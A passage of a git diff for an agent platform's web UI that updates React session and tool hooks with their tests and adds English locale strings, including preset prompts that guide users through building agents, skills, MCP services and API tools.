 }: UseSessionChatOptions) {
-  const [sessionId, setSessionId] = useState<string | null>(null);
+  const [sessionId, setSessionId] = useState<string | null>(initialSessionId);
   const [loading, setLoading] = useState(false);
   const [error, setError] = useState<string | null>(null);
 
-  const sessionIdRef = useRef<string | null>(null);
+  const sessionIdRef = useRef<string | null>(initialSessionId);
   const createPromiseRef = useRef<Promise<string> | null>(null);
   const optionsRef = useRef({ title, category, contextMessage, welcomeMessage });
   optionsRef.current = { title, category, contextMessage, welcomeMessage };
@@ -87,6 +92,15 @@ export function useSessionChat({
     [],
   );
 
+  useEffect(() => {
+    if (initialSessionId === sessionIdRef.current) return;
+    sessionIdRef.current = initialSessionId;
+    createPromiseRef.current = null;
+    setSessionId(initialSessionId);
+    setLoading(false);
+    setError(null);
+  }, [initialSessionId]);
+
   const retry = useCallback(() => {
     setError(null);
     create().catch(() => {});
@@ -105,12 +119,16 @@ export function useSessionChat({
       text,
       imageParts,
       agent,
+      model,
+      displayText,
     }: CreateAndSendOptions): Promise<string> => {
       const sid = await create();
       const payload: Record<string, unknown> = {
         parts: buildPromptParts(text, imageParts),
       };
       if (agent) payload.agent = agent;
+      if (model) payload.model = model;
+      if (displayText) payload.displayText = displayText;
       client.post(`/api/session/${sid}/prompt_async`, payload).catch(() => {});
       return sid;
     },
diff --git a/webui/src/hooks/useSessions.test.ts b/webui/src/hooks/useSessions.test.ts
index 514f9dc47..1a1e0b35a 100644
--- a/webui/src/hooks/useSessions.test.ts
+++ b/webui/src/hooks/useSessions.test.ts
@@ -165,6 +165,33 @@ describe('updateMessagePart scheduling', () => {
     expect(result.current.messages[0].parentID).toBe('msg-1');
   });
 
+  it('keeps assistant error info from fetched messages', async () => {
+    vi.mocked(client.get).mockResolvedValueOnce({
+      data: [{
+        info: {
+          id: 'msg-error',
+          sessionID: 'sess-1',
+          role: 'assistant',
+          finish: 'error',
+          error: {
+            name: 'APIConnectionError',
+            data: { message: 'Connection error.' },
+          },
+          time: { created: 123 },
+        },
+        parts: [],
+      }],
+    } as any);
+
+    const { result } = renderHook(() => useSessionMessages('sess-1'));
+
+    await act(async () => {});
+
+    expect(result.current.messages).toHaveLength(1);
+    expect((result.current.messages[0].error as any).data.message).toBe('Connection error.');
+    expect(result.current.messages[0].finish).toBe('error');
+  });
+
   it('first appearance of a new part updates messages state immediately', async () => {
     const { result } = renderHook(() => useSessionMessages('sess-1'));
     // Wait for the initial fetchMessages effect to settle so it doesn't wipe state
diff --git a/webui/src/hooks/useSessions.ts b/webui/src/hooks/useSessions.ts
index 5ee94aa58..708813fd7 100644
--- a/webui/src/hooks/useSessions.ts
+++ b/webui/src/hooks/useSessions.ts
@@ -212,8 +212,13 @@ export function useSessionMessages(sessionId?: string) {
         parentID: msg.info.parentID,
         agent: msg.info.agent,
         model: msg.info.model,
+        modelID: msg.info.modelID,
+        providerID: msg.info.providerID,
+        cost: msg.info.cost,
+        tokens: msg.info.tokens,
         timestamp: msg.info.time?.created || Date.now(),
         finish: msg.info.finish || null,
+        error: msg.info.error || null,
         compacted: msg.info.compacted || null,
       }));
       
@@ -266,6 +271,10 @@ export function useSessionMessages(sessionId?: string) {
             // overwrite them with undefined.
             compacted: messageInfo.compacted ?? existing.compacted,
             finish: messageInfo.finish ?? existing.finish,
+            tokens: messageInfo.tokens ?? existing.tokens,
+            modelID: messageInfo.modelID ?? existing.modelID,
+            providerID: messageInfo.providerID ?? existing.providerID,
+            cost: messageInfo.cost ?? existing.cost,
           };
           // When a message finishes streaming, evict its part IDs from the
           // known-parts registry to reclaim memory.
@@ -295,6 +304,10 @@ export function useSessionMessages(sessionId?: string) {
               parts: updated[tempIndex].parts,
               agent: messageInfo.agent,
               model: messageInfo.model,
+              modelID: messageInfo.modelID,
+              providerID: messageInfo.providerID,
+              cost: messageInfo.cost,
+              tokens: messageInfo.tokens,
               timestamp: messageInfo.time?.created || updated[tempIndex].timestamp,
             };
             return updated;
@@ -310,6 +323,10 @@ export function useSessionMessages(sessionId?: string) {
           parentID: messageInfo.parentID,
           agent: messageInfo.agent,
           model: messageInfo.model,
+          modelID: messageInfo.modelID,
+          providerID: messageInfo.providerID,
+          cost: messageInfo.cost,
+          tokens: messageInfo.tokens,
           timestamp: messageInfo.time?.created || Date.now(),
         };
 
@@ -330,13 +347,13 @@ export function useSessionMessages(sessionId?: string) {
       });
     },
     /**
-     * 增量更新 message part（用于流式展示）
-     * @param partInfo - part 对象，包含 id, messageID, sessionID, type, text 等
-     * @param delta - 本次增量文本（如果有的话）
+     * Incrementally update a message part for streaming rendering.
+     * @param partInfo - Part object containing id, messageID, sessionID, type, text, etc.
+     * @param delta - Optional text delta for this update.
      *
-     * 首次出现的 part（结构性变化）立即同步更新，确保"思考中"等指示符
-     * 即时显示；已知 part 的内容增量则用 startTransition 降低优先级，
-     * 允许 React 合批调度以避免高频 SSE chunk 阻塞主线程。
+     * New parts are structural changes and update synchronously so thinking or
+     * streaming indicators appear immediately. Deltas for known parts are
+     * lowered with startTransition so React can batch high-frequency SSE chunks.
      */
     updateMessagePart: (partInfo: any, delta?: string) => {
       const isNewPart = !knownPartIdsRef.current.has(partInfo.id);
diff --git a/webui/src/hooks/useTools.test.tsx b/webui/src/hooks/useTools.test.tsx
index 9823a58f7..0f7711090 100644
--- a/webui/src/hooks/useTools.test.tsx
+++ b/webui/src/hooks/useTools.test.tsx
@@ -1,4 +1,4 @@
-import { renderHook, waitFor } from '@testing-library/react';
+import { act, renderHook, waitFor } from '@testing-library/react';
 import { beforeEach, describe, expect, it, vi } from 'vitest';
 
 import { useTools } from './useTools';
@@ -15,22 +15,12 @@ vi.mock('@/api/tool', () => ({
   },
 }));
 
-function deferred<T>() {
-  let resolve!: (value: T | PromiseLike<T>) => void;
-  const promise = new Promise<T>((res) => {
-    resolve = res;
-  });
-  return { promise, resolve };
-}
-
 describe('useTools', () => {
   beforeEach(() => {
     vi.clearAllMocks();
   });
 
-  it('renders the tool list before the background refresh completes', async () => {
-    const refreshDeferred = deferred<{ data: { status: string } }>();
-
+  it('renders the tool list without automatically refreshing plugins', async () => {
     listMock.mockResolvedValue({
       data: [
         {
@@ -42,7 +32,6 @@ describe('useTools', () => {
         },
       ],
     });
-    refreshMock.mockReturnValue(refreshDeferred.promise);
 
     const { result } = renderHook(() => useTools());
 
@@ -53,22 +42,42 @@ describe('useTools', () => {
     expect(result.current.tools).toHaveLength(1);
     expect(result.current.tools[0].name).toBe('tool-alpha');
     expect(listMock).toHaveBeenCalledTimes(1);
-    expect(refreshMock).toHaveBeenCalledTimes(1);
+    expect(refreshMock).not.toHaveBeenCalled();
+  });
 
-    refreshDeferred.resolve({ data: { status: 'success' } });
+  it('fetches tools when the window regains focus without refreshing plugins', async () => {
+    listMock
+      .mockResolvedValueOnce({
+        data: [{ name: 'tool-alpha', description: 'alpha tool', category: 'custom', source: 'custom', enabled: true }],
+      })
+      .mockResolvedValueOnce({
+        data: [
+          { name: 'tool-alpha', description: 'alpha tool', category: 'custom', source: 'custom', enabled: true },
+          { name: 'tool-beta', description: 'beta tool', category: 'custom', source: 'custom', enabled: true },
+        ],
+      });
+
+    const { result } = renderHook(() => useTools());
 
     await waitFor(() => {
-      expect(listMock).toHaveBeenCalledTimes(2);
+      expect(result.current.loading).toBe(false);
     });
-  });
 
-  it('refreshes tools when the window regains focus after the throttle window', async () => {
-    const initialNow = Date.now();
+    expect(result.current.tools).toHaveLength(1);
+    expect(refreshMock).not.toHaveBeenCalled();
+
+    window.dispatchEvent(new Event('focus'));
+
+    await waitFor(() => {
+      expect(result.current.tools).toHaveLength(2);
+    });
+
+    expect(refreshMock).not.toHaveBeenCalled();
+    expect(listMock).toHaveBeenCalledTimes(2);
+  });
 
+  it('refreshes plugins only when refetch is called explicitly', async () => {
     listMock
-      .mockResolvedValueOnce({
-        data: [{ name: 'tool-alpha', description: 'alpha tool', category: 'custom', source: 'custom', enabled: true }],
-      })
       .mockResolvedValueOnce({
         data: [{ name: 'tool-alpha', description: 'alpha tool', category: 'custom', source: 'custom', enabled: true }],
       })
@@ -86,18 +95,15 @@ describe('useTools', () => {
       expect(result.current.loading).toBe(false);
     });
 
-    expect(result.current.tools).toHaveLength(1);
-    expect(refreshMock).toHaveBeenCalledTimes(1);
-
-    const dateNowSpy = vi.spyOn(Date, 'now').mockReturnValue(initialNow + 6000);
-    window.dispatchEvent(new Event('focus'));
+    await act(async () => {
+      await result.current.refetch();
+    });
 
     await waitFor(() => {
       expect(result.current.tools).toHaveLength(2);
     });
 
-    expect(refreshMock).toHaveBeenCalledTimes(2);
-    expect(listMock).toHaveBeenCalledTimes(3);
-    dateNowSpy.mockRestore();
+    expect(refreshMock).toHaveBeenCalledTimes(1);
+    expect(listMock).toHaveBeenCalledTimes(2);
   });
 });
diff --git a/webui/src/hooks/useTools.ts b/webui/src/hooks/useTools.ts
index 8ad23fc55..7a2c2dcba 100644
--- a/webui/src/hooks/useTools.ts
+++ b/webui/src/hooks/useTools.ts
@@ -5,7 +5,6 @@ export function useTools() {
   const [tools, setTools] = useState<Tool[]>([]);
   const [loading, setLoading] = useState(true);
   const [error, setError] = useState<string | null>(null);
-  const lastRefreshRef = useRef(0);
   const initializedRef = useRef(false);
 
   const fetchTools = useCallback(async (showLoading = false) => {
@@ -22,10 +21,7 @@ export function useTools() {
     }
   }, []);
 
-  const refreshAndFetch = useCallback(async (force = false) => {
-    const now = Date.now();
-    if (!force && now - lastRefreshRef.current < 5000) return;
-    lastRefreshRef.current = now;
+  const refreshAndFetch = useCallback(async () => {
     try {
       await toolAPI.refresh();
     } catch { /* ignore */ }
@@ -38,24 +34,17 @@ export function useTools() {
     const init = async () => {
       await fetchTools(true);
       if (cancelled) return;
-
-      try {
-        await refreshAndFetch(true);
-        if (cancelled) return;
-      } catch {
-        /* ignore */
-      }
     };
 
     void init();
 
     const onVisible = () => {
       if (document.visibilityState === 'visible') {
-        void refreshAndFetch(false);
+        void fetchTools(false);
       }
     };
     const onFocus = () => {
-      void refreshAndFetch(false);
+      void fetchTools(false);
     };
     document.addEventListener('visibilitychange', onVisible);
     window.addEventListener('focus', onFocus);
@@ -64,12 +53,12 @@ export function useTools() {
       document.removeEventListener('visibilitychange', onVisible);
       window.removeEventListener('focus', onFocus);
     };
-  }, [fetchTools, refreshAndFetch]);
+  }, [fetchTools]);
 
   return {
     tools,
     loading,
     error,
-    refetch: () => refreshAndFetch(true),
+    refetch: refreshAndFetch,
   };
 }
diff --git a/webui/src/locales/en-US/agent.json b/webui/src/locales/en-US/agent.json
index 8f94d77ab..d6d4d7d42 100644
--- a/webui/src/locales/en-US/agent.json
+++ b/webui/src/locales/en-US/agent.json
@@ -78,6 +78,133 @@
   "sheet": {
     "done": "Done"
   },
+  "create": {
+    "emptyStateTitle": "No creation conversation yet",
+    "guidePanelTitle": "Rex Assisted Creation",
+    "guidePanelDesc": "Choose a guide or case. Rex will load the agent-builder skill first, confirm name, role, boundaries, and strategy, then generate files.",
+    "guideSectionTitle": "Creation Guides",
+    "caseSectionTitle": "Creation Cases",
+    "guideActions": [
+      {
+        "label": "How to Create",
+        "description": "Start from name, role, boundaries, strategy, and tool allowlist.",
+        "prompt": "Please follow the .flocks/plugins/skills/agent-builder skill to guide me through creating a Flocks sub-agent. Do not write files yet. Use the question tool to ask one most important question at a time and help me clarify agent name, role description, capability boundaries, execution strategy, tool allowlist, output format, and avoid cases. After I confirm, generate ~/.flocks/plugins/agents/<name>/agent.yaml and prompt.md, and show a plan before writing."
+      },
+      {
+        "label": "Clarify Boundaries",
+        "description": "Turn a fuzzy need into delegatable agent description and triggers.",
+        "prompt": "Please help me clarify the sub-agent's responsibility boundaries so the agent-builder skill can create it. Ask one question at a time to confirm: what task it solves, when Rex should delegate to it, what it must not do, required tools, whether it is read-only, output format, and acceptance checks."
+      },
+      {
+        "label": "Choose Strategy",
+        "description": "Choose among read_only, react, plan_and_execute, and explore.",
+        "prompt": "Please use the agent-builder skill to help me choose an execution strategy for this sub-agent. First confirm task risk, whether it needs file writes, command execution, codebase exploration, or web lookup, then recommend read_only, react, plan_and_execute, or explore with an appropriate tool allowlist."
+      },
+      {
+        "label": "Design Prompt",
+        "description": "Create a reusable system prompt with output format and constraints.",
+        "prompt": "Please help me design the sub-agent prompt.md. First confirm role, mission, capability list, output format, constraints, and example invocation scenarios. Do not write files until I confirm. After confirmation, draft prompt.md using the agent-builder skill template."
+      }
+    ],
+    "caseActions": [
+      {
+        "label": "Threat Intel Agent",
+        "description": "Look up IOC reputation, correlate context, and produce an assessment report.",
+        "prompt": "I want to create a threat intelligence sub-agent for IP, domain, URL, and hash analysis. It should call existing intelligence tools in this project and output a structured assessment report. Please follow the agent-builder skill to guide me through name, tool allowlist, read-only boundaries, output format, and applicable scenarios."
+      },
+      {
+        "label": "Code Review Agent",
+        "description": "Read-only review of code risks, regressions, and missing tests.",
+        "prompt": "I want to create a code review sub-agent for read-only review of bugs, regression risks, security risks, and test gaps in code changes. Please follow the agent-builder skill to guide me through responsibility, read_only strategy, tool allowlist, and output format."
+      },
+      {
+        "label": "Log Analysis Agent",
+        "description": "Analyze security logs, extract key events, anomalies, and response suggestions.",
+        "prompt": "I want to create a log analysis sub-agent that reads security logs, identifies anomalous patterns, summarizes key events, and provides response recommendations. Please follow the agent-builder skill to guide me through input format, tool permissions, analysis steps, and final output structure."
+      }
+    ]
+  },
+  "edit": {
+    "emptyStateTitle": "No editing conversation yet",
+    "guidePanelTitle": "Rex Assisted Editing",
+    "guidePanelDesc": "Choose an editing entry. Rex will use the current Agent configuration to guide prompt, responsibility, permission, and parameter changes.",
+    "nativeGuidePanelDesc": "This is a built-in Agent. Only model and temperature can be saved, so Rex will guide model choice, temperature strategy, and validation.",
+    "guideSectionTitle": "Editing Guides",
+    "caseSectionTitle": "Editing Cases",
+    "guideActions": [
+      {
+        "label": "Improve Current Agent",
+        "description": "Review the current configuration, then clarify the change goal and boundaries.",
+        "prompt": "Please help me edit the current Agent \"{{name}}\". Start with a short diagnosis based on the current configuration and do not write files directly. Then use the question tool to ask one most important question at a time to clarify responsibility, prompt, tool permissions, output format, and acceptance checks. After confirmation, output a JSON configuration summary that can be extracted into the form."
+      },
+      {
+        "label": "Adjust Boundaries",
+        "description": "Clarify what it should do, when it should be delegated to, and what it must not do.",
+        "prompt": "Please help me refine the responsibility boundaries of the current Agent \"{{name}}\". Compare its existing description and System Prompt, point out anything too broad, too narrow, or unclear, then gradually confirm applicable scenarios, delegation triggers, avoid cases, required tools, and output structure."
+      },
+      {
+        "label": "Tighten Permissions",
+        "description": "Check whether Tools / Skills are excessive and reselect with least privilege.",
+        "prompt": "Please review the Tools and Skills configuration of the current Agent \"{{name}}\". The goal is least privilege: explain whether each capability is relevant to the responsibility, then recommend what to keep, remove, or add with reasons. Do not output the final configuration until I confirm."
+      },
+      {
+        "label": "Rewrite Prompt",
+        "description": "Improve role, constraints, steps, output format, and failure handling.",
+        "prompt": "Please help me rewrite the System Prompt of the current Agent \"{{name}}\". First point out whether its role, task steps, boundaries, output format, error handling, and example invocation are clear, then propose edits. After I confirm, output the complete Prompt and JSON configuration summary."
+      },
+      {
+        "label": "Validate Behavior",
+        "description": "Design test inputs, expected outputs, and failure criteria for post-save validation.",
+        "prompt": "Please help me validate the behavior of the current Agent \"{{name}}\". Based on its responsibility, design 2-3 test inputs and describe the expected output, pass criteria, and failure criteria for each. If the Prompt or tool permissions may affect the result, point out which fields should be adjusted. After confirmation, summarize the suggested configuration changes so they can be extracted into the form."
+      }
+    ],
+    "nativeGuideActions": [
+      {
+        "label": "Check Model Strategy",
+        "description": "Decide whether the current model fits this built-in Agent's task profile.",
+        "prompt": "Please review the model configuration of the built-in Agent \"{{name}}\". This is a built-in Agent: only model and temperature can be saved, so do not suggest changing Prompt, Tools, or Skills. First describe the model capabilities this task needs, then recommend whether to switch models and include the providerID and modelID if applicable."
+      },
+      {
+        "label": "Tune Temperature",
+        "description": "Choose temperature based on stability, creativity, and safety.",
+        "prompt": "Please help me tune the temperature of the built-in Agent \"{{name}}\". This is a built-in Agent: only model and temperature can be saved. Explain how lower or higher temperature affects this responsibility, then recommend a temperature value with reasoning and summarize it as extractable JSON."
+      },
+      {
+        "label": "Validate Behavior",
+        "description": "Design test inputs, expected outputs, and failure criteria for post-save validation.",
+        "prompt": "Please help me validate the model and temperature behavior of the built-in Agent \"{{name}}\". Design 2-3 test inputs with expected output, pass criteria, and failure criteria. If anything should change, only recommend model or temperature changes and summarize them as extractable JSON."
+      }
+    ],
+    "caseActions": [
+      {
+        "label": "Make It Safer",
+        "description": "Reduce hallucination and over-permission risk for security analysis or review.",
+        "prompt": "I want the current Agent \"{{name}}\" to be more conservative and reliable. Please adjust its Prompt, temperature recommendation, and permission boundaries so it asks clarifying questions or states uncertainty when information is insufficient, without guessing, while keeping output clear and verifiable."
+      },
+      {
+        "label": "Better Delegation",
+        "description": "Help the primary Agent decide when to call it and how to consume its result.",
+        "prompt": "I want the current Agent \"{{name}}\" to work better as a delegated sub-agent. Please improve its English description, responsibility triggers, input requirements, and output format, and check whether the tool allowlist matches."
+      },
+      {
+        "label": "Add Output Format",
+        "description": "Stabilize the result shape so the primary Agent or workflow can continue processing.",
+        "prompt": "Please help me add a stable output format for the current Agent \"{{name}}\". First confirm the main usage scenario, then design fields, nesting, a short example, and behavior for abnormal cases. After I confirm, turn it into Prompt edits."
+      }
+    ],
+    "nativeCaseActions": [
+      {
+        "label": "Make It Safer",
+        "description": "Reduce randomness for security analysis, audit, or review tasks.",
+        "prompt": "I want the built-in Agent \"{{name}}\" to be more conservative and reliable. Only suggest model and temperature changes; do not modify Prompt, Tools, or Skills. Focus on the recommended temperature, required model capabilities, and how to validate after saving."
+      },
+      {
+        "label": "Improve Responsiveness",
+        "description": "Choose a more suitable model and temperature without changing built-in configuration.",
+        "prompt": "I want the built-in Agent \"{{name}}\" to respond faster and more consistently. Only evaluate model and temperature, explain whether a lighter model is suitable, recommend a temperature, and propose test inputs to validate the result."
+      }
+    ]
+  },
   "chat": {
     "createTitle": "Create Sub-Agent",
     "subtitle": "Describe your needs through conversation, AI generates configuration automatically",
diff --git a/webui/src/locales/en-US/common.json b/webui/src/locales/en-US/common.json
index a41ec753e..641b9da5f 100644
--- a/webui/src/locales/en-US/common.json
+++ b/webui/src/locales/en-US/common.json
@@ -113,7 +113,7 @@
     "defaultCreate": "Create",
     "defaultSave": "Save",
     "tabDetails": "Details",
-    "tabAIEdit": "AI Edit",
+    "tabAIEdit": "Workbench",
     "tabTest": "Test",
     "rexThinking": "Agent is thinking...",
     "editAndSend": "Edit the content below and send to the Agent to see the result",
@@ -127,7 +127,10 @@
     "cancelButton": "Cancel",
     "extracting": "Extracting...",
     "extractFromRex": "Extract from Rex",
+    "extractFromRexGuideDesc": "Extract Rex's configuration summary into the form.",
     "switchToForm": "Switch to Form",
+    "guideCollapse": "Collapse creation guides",
+    "guideExpand": "Expand creation guides",
     "testStartFailed": "Test start failed",
     "extractFailed": "Extraction failed, please retry",
     "rexAssist": "Rex Assist",
@@ -145,6 +148,7 @@
     "yes": "Yes",
     "no": "No",
     "needsAnswer": "Needs your response",
+    "customAnswer": "Custom / additional note",
     "confirm": "Confirm",
     "skip": "Skip"
   },
diff --git a/webui/src/locales/en-US/nav.json b/webui/src/locales/en-US/nav.json
index 7b54707aa..4eb050c04 100644
--- a/webui/src/locales/en-US/nav.json
+++ b/webui/src/locales/en-US/nav.json
@@ -23,6 +23,8 @@
   "expandNav": "Expand navigation",
   "collapseNav": "Collapse navigation",
   "switchLanguage": "Switch Language",
+  "switchToDarkTheme": "Switch to dark mode",
+  "switchToLightTheme": "Switch to light mode",
   "newVersion": "New Version",
   "hasNewVersion": "New version {{version}}",
   "versionInfo": "Flocks version info",
diff --git a/webui/src/locales/en-US/session.json b/webui/src/locales/en-US/session.json
index eb1118208..ebbf940ca 100644
--- a/webui/src/locales/en-US/session.json
+++ b/webui/src/locales/en-US/session.json
@@ -85,6 +85,34 @@
     "stopTitle": "Stop execution",
     "contextUsageTitle": "Context used: {{used}} / {{total}} ({{percent}}%)",
     "contextUsageUnknown": "Context usage unknown",
+    "contextUsage": {
+      "title": "Context Usage",
+      "close": "Close",
+      "full": "{{percent}}% Full",
+      "tokens": "~{{used}} / {{total}} Tokens",
+      "excludedTokens": "{{tokens}} excluded",
+      "noAttributedSegments": "No attributed breakdown",
+      "breakdown": {
+        "systemPrompt": "System prompt",
+        "toolDefinitions": "Tool definitions",
+        "tools": "Tool calls",
+        "skillLoad": "Skill loads",
+        "agentDelegation": "Agent delegation",
+        "conversation": "Conversation",
+        "reasoning": "Reasoning",
+        "draft": "Current draft",
+        "compactedHistory": "Compacted history"
+      }
+    },
+    "goal": {
+      "dismiss": "Dismiss goal notice",
+      "status": {
+        "active": "Goal",
+        "completed": "Completed",
+        "blocked": "Blocked",
+        "paused": "Paused"
+      }
+    },
     "edit": "Edit",
     "editRawHint": "You are editing the original unrendered content. Saving updates the raw message text directly.",
     "editRawTitle": "Edit raw content",
@@ -96,6 +124,11 @@
     "regenerate": "Regenerate",
     "thinking": "Thinking...",
     "streaming": "Streaming...",
+    "process": {
+      "title": "Process ({{count}})",
+      "reasoningCount": "{{count}} reasoning",
+      "toolCount": "{{count}} tool calls"
+    },
     "you": "You",
     "sending": "Sending...",
     "contextCompressed": "Context compressed",
@@ -160,10 +193,24 @@
       "inputParams": "Input Parameters",
       "outputResult": "Output Result",
       "todoStages": "Todo stages",
+      "todoStatus": {
+        "pending": "pending",
+        "inProgress": "in progress",
+        "completed": "completed",
+        "cancelled": "cancelled"
+      },
+      "todoSummary": {
+        "progress": "Progress",
+        "inProgress": "In progress",
+        "completed": "Completed",
+        "done": "Done"
+      },
       "errorLabel": "Error",
       "elapsed": "Elapsed",
       "workflowStage": "Current stage: {{phase}}",
       "workflowNode": "Node: {{node}}",
+      "workflowLoopIteration": "Loop",
+      "workflowLoopCurrent": "Current",
       "workflowStep": "Step: {{step}}",
       "workflowPhase": {
         "queued": "Queued",
diff --git a/webui/src/locales/en-US/skill.json b/webui/src/locales/en-US/skill.json
index d6cbcb46f..fd4b11ff5 100644
--- a/webui/src/locales/en-US/skill.json
+++ b/webui/src/locales/en-US/skill.json
@@ -79,6 +79,47 @@
     "missingDepsWarning": "Skill installed, but missing dependencies: {{missing}}",
     "runInstallDeps": "Click \"Install deps\" to complete setup"
   },
+  "create": {
+    "emptyStateTitle": "No creation conversation yet",
+    "guidePanelTitle": "Rex Assisted Creation",
+    "guidePanelDesc": "Choose a guide or case. Rex will first load the skill-builder skill, then confirm the goal, triggers, file structure, and validation before generating files.",
+    "guideSectionTitle": "Creation Guides",
+    "caseSectionTitle": "Creation Cases",
+    "guideActions": [
+      {
+        "label": "How to Create",
+        "description": "Start from purpose, triggers, instruction structure, dependencies, and validation.",
+        "prompt": "Please follow the .flocks/plugins/skills/skill-builder skill to guide me through creating a Flocks Skill. Do not write files yet. Use the question tool to ask only the single most important question at a time and help me clarify skill name, purpose, trigger scenarios, needed references/scripts, dependencies, output directory, and validation. After I confirm, generate ~/.flocks/plugins/skills/<skill-name>/SKILL.md and any necessary files."
+      },
+      {
+        "label": "Clarify Instructions",
+        "description": "Turn a fuzzy capability into a SKILL.md agents can use correctly.",
+        "prompt": "Please help me structure the skill instructions for SKILL.md. Ask one question at a time to confirm: what problem the skill solves, trigger keywords, when to use or avoid it, execution steps, reference materials, reusable scripts, quality checks, and examples."
+      },
+      {
+        "label": "Dependencies & Checks",
+        "description": "Plan bin/env/install specs, smoke tests, and failure guidance.",
+        "prompt": "Please use the skill-builder skill to help me design dependencies and validation for this Skill. First confirm whether it needs CLI tools, Python/Node packages, environment variables, or external services, then propose install specs, check commands, smoke tests, and user-facing failure guidance."
+      }
+    ],
+    "caseActions": [
+      {
+        "label": "Security Analysis Skill",
+        "description": "Capture threat analysis steps, report format, and constraints as a Skill.",
+        "prompt": "I want to create a security analysis Skill that guides agents through alert or IOC analysis and outputs a structured assessment report. Please follow the skill-builder skill to guide me through triggers, analysis flow, report fields, references, and validation."
+      },
+      {
+        "label": "Code Migration Skill",
+        "description": "Capture cross-file migration, tests, and rollback considerations.",
+        "prompt": "I want to create a code migration Skill for framework upgrades or cross-file migrations. Please follow the skill-builder skill to guide me through applicable scenarios, migration steps, risk checks, test commands, and output format."
+      },
+      {
+        "label": "External System Skill",
+        "description": "Record usage flow, prohibited actions, and tool-call constraints for a system.",
+        "prompt": "I want to create an external system usage Skill that guides agents when operating a business system. Please follow the skill-builder skill to guide me through system name, login/query flow, available tools, prohibited bypasses, sensitive data handling, and acceptance checks."
+      }
+    ]
+  },
   "sheet": {
     "entityType": "Skill",
     "path": "Path",
diff --git a/webui/src/locales/en-US/tool.json b/webui/src/locales/en-US/tool.json
index 81f87692e..77169ccdf 100644
--- a/webui/src/locales/en-US/tool.json
+++ b/webui/src/locales/en-US/tool.json
@@ -92,6 +92,132 @@
     "testDetail": "Test / Details"
   },
 
+  "create": {
+    "mcp": {
+      "emptyStateTitle": "No setup conversation yet",
+      "guidePanelTitle": "Rex Assisted Setup",
+      "guidePanelDesc": "Choose a guide or case. Rex will confirm service type, transport, credentials, and start command before generating a testable MCP config.",
+      "guideSectionTitle": "Setup Guides",
+      "caseSectionTitle": "Setup Cases",
+      "guideActions": [
+        {
+          "label": "How to Add MCP",
+          "description": "Start from service name, stdio/SSE, command args, auth, and connectivity test.",
+          "prompt": "Please guide me through adding an MCP service. Do not write config yet. Use the question tool to ask only the single most important question at a time and help me confirm service name, transport (stdio or remote HTTP/SSE), start command or URL, auth method, credential storage, exposed tools, and connectivity test steps. After I confirm, generate the config and test it."
+        },
+        {
+          "label": "Local Stdio Service",
+          "description": "For MCP servers started by npx, uvx, python, or other local commands.",
+          "prompt": "Please help me add a local stdio MCP service. First confirm service name, start command, each command argument, required environment variables or secrets, working directory, and test method. Do not write config until I confirm."
+        },
+        {
+          "label": "Remote SSE/HTTP",
+          "description": "For deployed remote MCP services; confirm URL, transport, and auth.",
+          "prompt": "Please help me add a remote MCP service. First confirm service URL, transport (auto/SSE/Streamable HTTP), auth method, headers or token, whether secret management is needed, and health-check method. Do not write config until I confirm."
+        }
+      ],
+      "caseActions": [
+        {
+          "label": "GitHub MCP",
+          "description": "Add GitHub repository, issue, and pull request tools.",
+          "prompt": "I want to add a GitHub MCP service for repository, issue, and pull request operations. Please guide me through service name, start command, GITHUB_TOKEN secret storage, permission scope, and test steps."
+        },
+        {
+          "label": "Filesystem MCP",
+          "description": "Add file access for one restricted directory.",
+          "prompt": "I want to add a Filesystem MCP service that only accesses a specified directory. Please guide me through directory scope, read/write permissions, start arguments, safety limits, and test steps."
+        },
+        {
+          "label": "Remote Business MCP",
+          "description": "Add an internally deployed remote MCP service.",
+          "prompt": "I want to add an internal remote MCP service. Please guide me through URL, auth method, credential management, network reachability, tool-list inspection, and pre-production validation."
+        }
+      ]
+    },
+    "api": {
+      "emptyStateTitle": "No setup conversation yet",
+      "guidePanelTitle": "Rex Assisted Setup",
+      "guidePanelDesc": "Choose a guide or case. Rex will load the tool-builder skill, confirm API docs, auth, and output shape, then generate a YAML tool.",
+      "guideSectionTitle": "Setup Guides",
+      "caseSectionTitle": "Setup Cases",
+      "guideActions": [
+        {
+          "label": "How to Add API",
+          "description": "Start from Base URL, auth, endpoints, inputs, outputs, and test sample.",
+          "prompt": "Please follow the .flocks/plugins/skills/tool-builder skill to guide me through adding an external API as Flocks tools. Do not write files yet. Use the question tool to ask only the single most important question at a time and confirm API name, Base URL, auth method, core endpoints, input parameters, output fields, error handling, secret storage, and smoke test. After I confirm, generate YAML tools under ~/.flocks/plugins/tools/api/."
+        },
+        {
+          "label": "Parse API Docs",
+          "description": "Turn docs, sample requests, and responses into a tool definition draft.",
+          "prompt": "Please help me parse the API documentation into tool creation requirements. First ask for the docs URL or content, then extract endpoint paths, methods, auth, request parameters, response fields, pagination/rate limits, error codes, and test samples. Do not write files until I confirm."
+        },
+        {
+          "label": "Auth & Secrets",
+          "description": "Confirm API Key, Bearer, Header, Query, and credential storage.",
+          "prompt": "Please help me design auth and secret management for the API tool. First confirm auth type, secret name, whether {secret:...} is supported, whether default environment variables are needed, failure messages, and test method. Do not hardcode real credentials in code or config."
+        }
+      ],
+      "caseActions": [
+        {
+          "label": "Threat Intel API",
+          "description": "Add IOC lookup, reputation scoring, or intelligence summary endpoints.",
+          "prompt": "I want to add a threat intelligence API for IP, domain, URL, or hash reputation lookup. Please follow the tool-builder skill to guide me through API docs, auth method, input/output fields, error handling, and smoke test."
+        },
+        {
+          "label": "Alert Platform API",
+          "description": "Add alert query, detail lookup, or status update endpoints.",
+          "prompt": "I want to add an alert platform API for listing alerts, fetching details, or updating handling status. Please follow the tool-builder skill to guide me through endpoint scope, pagination, auth, output structure, and test data."
+        },
+        {
+          "label": "Asset Query API",
+          "description": "Add asset, host, vulnerability, or tag query endpoints.",
+          "prompt": "I want to add an asset query API for looking up assets by IP, hostname, or tags. Please follow the tool-builder skill to guide me through API docs, parameters, response fields, secret management, and validation."
+        }
+      ]
+    },
+    "local": {
+      "emptyStateTitle": "No creation conversation yet",
+      "guidePanelTitle": "Rex Assisted Creation",
+      "guidePanelDesc": "Choose a guide or case. Rex will load the tool-builder skill, confirm inputs, outputs, implementation, and smoke tests, then generate a local Python tool.",
+      "guideSectionTitle": "Creation Guides",
+      "caseSectionTitle": "Creation Cases",
+      "guideActions": [
+        {
+          "label": "How to Create Tool",
+          "description": "Start from tool name, parameter schema, return format, permissions, and test sample.",
